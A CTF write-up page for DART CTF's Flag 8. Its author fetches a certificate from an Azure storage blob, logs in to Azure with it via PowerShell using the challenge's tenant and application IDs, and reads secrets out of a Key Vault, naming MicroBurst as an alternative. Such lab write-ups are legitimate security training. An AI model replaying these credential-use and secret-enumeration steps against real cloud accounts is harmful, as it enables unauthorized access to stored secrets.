Kabinet's GitBook
  • 🚩Kabinet CTF's Writeups
  • Page
  • 2025
    • Thuderdome
      • Emerge through the breach
      • Pulled from the sky
      • An absent defense
      • A new wave (web of deceit)
      • Crossing the great divide
      • Joining forces as one
      • Infiltrate (open the gate)
      • Jaeger
      • Victory
  • 2024
    • GreyCTF 2024
      • Markdown Parser
      • Fearless Concurrency
      • GreyCTF Survey
      • Baby Web
      • Beautiful Styles
      • All About Timing
      • Poly Playground
    • TetCTF 2024
      • Hello from API GW
      • Microservices
  • 2023
    • BSidesSF Cloud Village CTF
      • Tony Tony Tony
      • Plain Sight
      • A Suit of Armor Around The World
      • Sharing is Caring + Sequel
      • Photo Drive
    • DART CTF
      • Flag 1
      • Flag 2
      • Flag 3
      • Flag 4
      • Flag 5
      • Flag 6
      • Flag 7
      • Flag 8
      • Flag 9
      • Flag 10
    • EKS Cluster Games
    • Big IAM Challenge
  • 2022
    • Stack The Flag
      • Secret of Meow Olympurr
  • Authored
    • Cyber League 2025 Major 1
      • Perfect Storage
      • catalog commits
      • pawtainer hub
    • Lag and Crash 2023
      • Managed Secrets
      • Pickle Rick
      • Cloudy with a chance of meatball
    • NYP InfoSec December CTF 2022
      • Super Secure Technology Infrastructure
      • Self Introduction
      • Aww Cuter Cat
      • Obligatory Calc
      • BreadSecurity
  • NYP InfoSec Introduction to Pentesting Workshop
Powered by GitBook
On this page

Was this helpful?

  1. 2023
  2. DART CTF

Flag 8

PreviousFlag 7NextFlag 9

Last updated 1 year ago

Was this helpful?

Continuing where I left off from Flag 7, I retrieved the LORRI-Cert.txt

Request

curl --location 'https://coresat.blob.core.windows.net/datahandling/LORRI-Cert.txt' \
--header 'Authorization: Bearer ${token}' \
--header 'x-ms-version: 2017-11-09'

Response

I saved the response to a file, and opening it using notepad shows a bunch of base64 encoded value. As the file name suggest that its some kind of certificate, more googling needs to be done.

The article from Azure shows how I can authenticate with the cert.

ChatGPT also helped out by giving step by step instructions.

The Application ID is retrieved from the current version of OSIRIS-REx.txt found in tsarray stroage account at Flag 2.

Import-Certificate -FilePath C:\Users\Edwin\Desktop\cert.pfx -CertStoreLocation Cert:\CurrentUser\My
Get-ChildItem -Path Cert:\CurrentUser\My
Connect-AzAccount -CertificateThumbprint "208AC4D5170A93061432E06C16F573E776E6180C" -SubscriptionId "7b9bd916-8bd2-4446-9678-8531ef663edb" -ApplicationId "6de8103e-049a-4f88-9abf-41099a79ca53" -TenantId "5f487283-b88e-4ade-8035-7bcaac4156b3"

Running the Get-AzResource shows that I have access to an Azure Key Vault.

Now, I can either manually enumerate the Azure Key Vault, or use MicroBurst Get-AzPasswords to list the key vault secrets.

Get-AzKeyVault
Get-AzKeyVaultSecret -VaultName cubesat

Get-AzKeyVaultSecret -VaultName cubesat -Name Flag8 -AsPlainText

Flag 8 : DART spacecraft has entered final descent.

LogoSign in with Azure PowerShellMicrosoftLearn